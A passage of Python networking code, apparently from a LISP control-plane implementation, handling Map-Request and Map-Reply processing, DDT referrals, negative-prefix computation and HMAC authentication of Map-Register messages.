lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Does policy say what the ttl should be? And if we should drop the
# Map-Request and return a negative Map-Reply
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, False, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs".format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from an Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# Check auth-prefix. That means there are no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix to not
# be shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for auth-prefix in DDT cache. If not found, we return the host
# based EID in a negative Map-Referral, action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
# record. Temporary return requested prefix until we have lisp_ms_compute_
# neg_prefix() working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group= group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, False,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver transmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
# Get referral-node for who we sent Map-Request to last time. We need
# to increment, the no-response timer.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and ref.referral_set.has_key(last_node)):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in referral.referral_set.values():
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on a EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
# If caller wants us to use the root versus best match lookup. We only
# so this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received by an ITR. We need to forward this Map-Request
# to the longest matched referral from the referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request,
mr_source, mr_port, ttl)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If negative Map-Reply, see if from a Map-Resolver, do some counting
# and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
# cache more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Do not let map-cache entries from Map-Replies override gleaned
# entries.
#
if (mc == None):
glean, nil = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (glean): continue
else:
if (mc.gleaned): continue
#endif
#
# Process each RLOC record in EID record.
#
rloc_set = []
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for map-cache entry. Ignore an RLOC with a
# different address-family of the recieved packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc.rloc, source, port,
map_reply.nonce, map_reply.hop_count, ttl)
#endif
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
# Did keys change for thie RLOC, flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
# be behind the same NAT as this ITR. This ITR, however could be
# behind another NAT or in public space. We want to mark the
# private address RLOC unreachable for the two later cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
# RTR should not put RTR RLOC in map-cache. But xTRs do. None
# RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
mc.map_cache_ttl = eid_record.store_ttl()
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
#endif
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
mc.refresh_time = lisp_get_timestamp()
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents store in lisp_map_register() and
# encode in packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
if (do_hex):
hashval = hmac.new(password, packet, hashalg).hexdigest()
else:
hashval = hmac.new(password, packet, hashalg).digest()
#endif
return(hashval)
#enddef
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
# Print differences if hashes if they do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
#
# lisp_retransmit_map_notify
#
# Retransmit the already build Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
